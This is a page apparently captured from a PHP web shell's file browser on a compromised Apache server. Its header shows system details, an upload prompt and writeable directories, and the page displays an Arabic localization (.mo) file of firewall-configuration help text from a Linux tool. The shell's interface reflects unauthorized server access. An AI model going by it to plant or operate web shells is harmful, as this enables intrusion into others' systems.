KGRKJGETMRETU895U-589TY5MIGM5JGB5SDFESFREWTGR54TY
Server : Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 DAV/2 PHP/5.2.17
System : Linux localhost 2.6.18-419.el5 #1 SMP Fri Feb 24 22:47:42 UTC 2017 x86_64
User : nobody ( 99)
PHP Version : 5.2.17
Disable Function : NONE
Directory :  /usr/share/locale/ar/LC_MESSAGES/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //usr/share/locale/ar/LC_MESSAGES/system-config-securitylevel.mo
;O)	!3U	})U'>}.]xJNP()),07)	*4ENh	pz~"09X\y
D]\zO'Y"@~%'d)C8+|+--/*0o13f2-2C34E%4Gk444
44;5;6JH66$66967737&773^7&77
7
7767`*88 888 8 8:9
K9V9);10;&b;`;6;#5+21-*73	8$!'4
"6 
(/.9%0;&,):
ERROR - You must be root to run lokkit.

Firewall Configuration

   A firewall sits between your computer and the network, 
   and determines which resources on your computer remote
   users on the network are able to access. A
   properly configured firewall can greatly increase
   the out-of-the-box security of your system.


Firewall Customization

   Choose which trusted devices and incoming services
   should be allowed for your network security
   settings.

     * FTP -- FTP is a protocol used for remote file
       transfer. If you plan on making your FTP
       server publicly available, enable this option.
       You need the vsftpd package installed for this
       option to be useful.
     * Mail (SMTP) -- This allows incoming SMTP mail
       delivery. If you need to allow remote hosts to
       connect directly to your machine to deliver
       mail, enable this option. You do not need to
       enable this if you collect your mail from your
       ISP's server by POP3 or IMAP, or if you use a
       tool such as fetchmail. Note that an
       improperly configured SMTP server can allow
       remote machines to use your server to send
       spam.
     * Other ports -- You can specify that other
       ports not listed here be allowed through the
       firewall. The format to use is
       'port:protocol'. For example, if you wanted to
       allow IMAP access through your firewall, you
       can specify 'imap:tcp'. You can also specify
       numeric ports explicitly; to allow UDP packets
       on port 1234 through, specify '1234:udp'. To
       specify multiple ports, separate them by
       commas.
     * SSH -- Secure Shell (SSH) is a protocol for
       logging into and executing commands on remote
       machines. It provides secure encrypted
       communications. If you plan on accessing your
       machine remotely via SSH over a firewalled
       interface, enable this option. You need the
       openssh-server package installed for this
       option to be useful.
     * Telnet -- Telnet is a protocol for logging
       into remote machines. It is unencrypted, and
       provides little security from network snooping
       attacks. Enabling telnet is not recommended.
       You need the telnet-server package installed
       for this option to be useful.
     * WWW (HTTP) -- HTTP is the protocol used 
       to serve Web pages. If you plan on
       making your Web server publicly available,
       enable this option. This option is not
       required for viewing pages locally or
       developing Web pages. You need the httpd
       package installed for this option to be
       useful.
   Choose the appropriate security level for your
   system.

   Disabled -- Disabling the  firewall allows complete
   access and does no security checking. It is recommended
   that this only be selected if you are running on a
   trusted network (not the Internet), or if you plan
   to do more detailed firewall configuration later.

   Enabled -- By choosing enabled, your system will
   not accept connections from the outside that are
   not explicitly defined by you.

   If you are connecting your system to the Internet,
   but do not plan to run a server, this is the
   safest choice. If additional services are needed,
   you can choose Customize to allow specific
   services through the firewall, or to implicitly
   trust traffic coming over certain interfaces.

   It is not recommended to enable this for devices
   that are connected to public networks, such as the
   Internet.

   Trusted Devices -- Checking these for any of your
   devices allows all traffic coming from that device
   to be allowed. For example, if you are running a
   local network, but are connecting to the Internet
   via a PPP dialup, you could check that eth0 is
   trusted to allow any traffic coming from your
   local network.

 <Tab>/<Alt-Tab> between elements   |   <Space> selects  |   <F12> next screen'enforcing', 'permissive', or 'disabled'A firewall protects against unauthorized network intrusions. Enabling a firewall blocks all incoming connections. Disabling a firewall allows all connections and is not recommended. Allow all traffic on the specified deviceAllow incoming:Allow specific ports through the firewallBackwards compatibilty, aliased to --enabledBackwards compatiblity, ignoredCancelClicking the 'Yes' button will set the security level of the system and override any existing firewall configuration.  Are you sure that you want to do this?Configure SELinuxConfigure SELinux PolicyConfigure firewall but do not activate itCustomizeDisable firewallDisabledEnable firewall (default)EnabledEnforcingFTPFirewall ConfigurationFirewall Configuration - CustomizeFirewall CustomizationMail (SMTP)OKOkOther portsPlease choose the security level for the system.Run noninteractively; process only command-line argumentsSSHSecurity Level ConfigurationSecurity Level:TelnetTrusted Devices:Trusted services:Usually 'targeted' or 'strict'WWW (HTTP)You can customize your firewall in two ways. First, you can select to allow all traffic from certain network interfaces. Second, you can allow certain protocols explicitly through the firewall. Specify additional ports in the form 'service:protocol', such as 'imap:tcp'. _Firewall Options_SELinuxdevice to trustignore settings stored in /etc/sysconfig/system-config-securitylevelport:protocol (e.g, ssh:tcp)Project-Id-Version: system-config-securitylevel
Report-Msgid-Bugs-To: 
POT-Creation-Date: 2006-11-28 10:51-0500
PO-Revision-Date: 2004-09-04 20:15-0500
Last-Translator: Sherif Abdelgawad <sherif@redhat.com>
Language-Team: Arabic <fedora-trans-ar@redhat.com>
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

خطأ - يجب أن تكون المستخدم root كي تُشغّل lokkit.

تهيئة الجدار النّاري

   يكمن الجدار النّاري بين حاسوبك والشّبكة، 
   ويُقرّر الموارد على حاسوبك التي يُسمح
   للمستخدمين البعيدين على الشّبكة الوصول لها.
   الجدار النّاري المُهيّأ بشكل ملائمة يمكنه زيادة
   أمْن نظامك من البداية.


تخصيص الجدار النّاري

   اختر أيّاً من الأجهزة الموثوقة والخدمات القادمة
   يجب أن تُسمح لإعدادات أمْن
   شبكتك.

     * FTP -- FTP هو بروتوكول يُستخدم لنقل الملفّات
       البعيدة. إن كنت تنوي جعل خادم FTP
       الخاصّ بك متوفّراً للعامّة، مكّن هذا الخيار.
       تحتاج إلى تثبيت الحزمة vsftpd كي
       يكون هذا الخيار مفيداً.
     * بريد (SMTP) -- يسمح هذا بتوصيل بريد SMTP
       الوارد. إن كنت تحتاج السّماح للمضيفين البعيدين
       الاتصال مباشرة إلى ماكينتك لتوصيل
       البريد، فمكّن هذا الخيار. لا تحتاج إلى
       تمكين هذا إن كنت تُجمّع بريدك من
       خادم مزوّد خدمات الإنترت (ISP) عبر POP3 أو IMAP، أو إن كنت تستخدم
       أداة مثل fetchmail. لاحظ أنّ
       خادم SMTP الغير مهيّأ بشكل ملائم قد يسمح
       للماكينات البعيدة باستخدام خادمك لإرسال
       البريد اللّامرغوب.
     * منافذ أخرى -- يُمْكنك تحديد أن تكون المنافذ
       الأخرى الغير مسرودة هنا مسموحة عبر
       الجدار النّاري. النّسق المُستخدم هو
       'المنفذ:البروتوكول'. مثلاً، إن أردت أن
       تسمح بوصول IMAP عبر جدارك النّاري،
       فيُمكنك تحديد 'imap:tcp'. يمكن أيضاً تحديد
       منافذ رقميّة بشكل صريح، كي تسمح لرُزم UDP
       على المنفذ 1234 بالمرور، حدّد '1234:udp'. كي
       تحدّد منافذ عدّة، فقم بفصْلها
       بفواصل.
     * SSH -- الصَّدَفة الآمنة (SSH) هو بروتوكول
       لتسجيل الدّخول إلى وتنفيذ الأوامر على الأجهزة
       البعيدة. يُوفّر هذا البروتوكول اتّصالات آمنة
       مُشفّرة. إن كنت تنوي الوصول إلى
       ماكينتك عن بعد عبر SSH عبر واجهة
       محميّة بجدار ناريّ، فمكّن هذا الخيار. تحتاج إلى
       تثبيت حزمة openssh-server كي
       يكون هذا الخيار مُفيداً.
     * Telnet -- Telnet هو بروتوكول لتسجيل الدّخول
       إلى الماكينات البعيدة. وهو غير مُشفّر، و
       يُقدّم أمْناً بسيطاً من هجمات التّطفّل
       الشّبكيّة. تمكين telnet ليس مُستحسناً.
       تحتاج إلى تثبيت حزمة telnet-server
       كي يكون هذا الخيار مفيداً.
     * WWW (HTTP) -- HTTP هو بروتوكول يستخدم 
       لتقديم صفحات الوب. إن كنت تنوي
       جعل خادم الوب متوفّراً للعامّة،
       فمكّن هذا الخيار. هذا الخيار غير
       مطلوب لعرض الصّفحات محلّيّاً أو
       تطوير صفحات الوب. تحتاج إلى تثبيت
       حزمة httpd كي يكون هذا الخيار
       مفيداً.
   اختر مستوى الأمن الملائم
   لنظامك.

   مُعطّل -- تعطيل الجدار النّاري يسمح بالوصول
   الكامل ولا يقوم بأيّ تفحّص أمّني. من المستحسن
   أن يتمّ اختيار هذا فقط عند العمل على
   شبكة موثوقة (وليس الإنترنت)، أو إن كنت تنوي
   أن تقوم لاحقاً بعمل تهيئة جدار ناريّ مُفصّلة.

   مُمكّن -- باختيار مُمكّن، لن يقبل
   نظامك أيّة اتّصالات من الخارج ليست
   مُعرّفة بصراحة من قبلك.

   إن كنت تقوم بتوصيل نظامك إلى الإنترنت،
   لكن لا تنوي تشغيل خادم، فهذا هو
   الاختيار الأكثر أمْناً. إن كانت هناك حاجة لخدمات إضافيّة،
   يمكنك اختيار التّخصيص لتسمح بخدمات
   مُعيّنة خلال الجدار النّاري، أو كي تَثِقَ
   ضِمنيّاً بالسّير القادم عبر واجهات مُحدّدة.

   من المستحسن تمكين هذا للأجهزة
   التي تتّصل بشبكات عامّة، مثل
   الإنترنت.

   الأجهزة الموثوقة -- اختيار هذه لأيّ من
   أجهزتك يسمح بمرور كلّ السّير القادم من
   ذلك الجهاز. مثلاً، إن كنت تدير
   شبكة محليّة، ولكن تتّصل إلى الإنترنت
   عبر اتصال PPP هاتفي، يمكنك تحديد اختيار الوثوق بـeth0
   للسّماح بأيّ سَيْر قادم من
   الشّبكة المحليّة.

 <Tab>/<Alt-Tab> بين العناصر   |   <مسافة> تحدّد  |   <F12> الشّاشة التّالية'مُقوّي', 'تخويليّ', or 'مُعطّل'الجدار النّاريّ يحمي من التّدخّلات الشّبكيّة الغير مُخوّلة. تمكين جدار ناريّ يمنع كل الاتّصالات القادمة. تعطيل الجدار النّاريّ يسمح بكلّ الاتّصالات وليس مُستحسناً.اسمح بكلّ السّير عبر الجهاز المُحدّداسمح بالقادم:اسمح لمنافذ معيّنة عبر الجدار النّاريالتّوافق الرّجعي، مُسمّى بدلاً بـ--enabledالتّوافق الرّجعي، مُتَجاهَلإلغاءالضّغط على زرّ 'نعم' سوف يُحدّد مستوى الأمن للنّظام و يتخطّى أيّ تهيئة جدار ناريّ موجودة.  هل أنت متأكّد أنّك تريد عمل هذا؟تهيئة لينكس المُحسّن الأمن (SELinux)تهيئة لينكس المُحسّن الأمن (SELinux)قُم بتهيئة الجدار النّاري لكن دون تنشيطهخصّصعطّل الجدار النّاريمُعطّلمكّن الجدار النّاري (الافتراضي)مُمكّنالتنفيذ إجبارياFTPتهيئة الجدار النّاريتهيئة الجدار النّاري - تخصيصتخصيص الجدار النّاريبريد (SMTP)موافقموافقمنافذ أخرىرجاء اختر مستوى الأمن للنّظامشغّل بشكل غير تفاعليّ، وعالج فقط مُعطيات سطر الأوامرSSHتهيئة مستوى الأمنمستوى الأمن:Telnetالأجهزة الموثوقة:الخدمات الموثوقة:عادةً ما يكون موجهاً‘ أو مقيداًWWW (HTTP)يمكنك تخصيص جدارك النّاريّ بطريقتين. الأولى، يمكنك اختيار السّماح بكلّ السّيْر من واجهات شبكيّة مُحدّدة. الثّانية، يمكنك السّماح لبروتوكولات مُعيّنة بشكل صريح عبر الجدار النّاريّ. حدّد منافذ إضافيّة بالنّسق 'خدمة:بروتوكول'، مثل 'imap:tcp'. خيارات ال_جدار النّاري_لينكس المُحسّن الأمن (SELinux)الجهاز لجعله موثوقاًتجاهل الإعدادات المُخزّنة في /etc/sysconfig/system-config-securitylevelالمنفذ:البروتوكول (مثلا، ssh:tcp)

Anon7 - 2021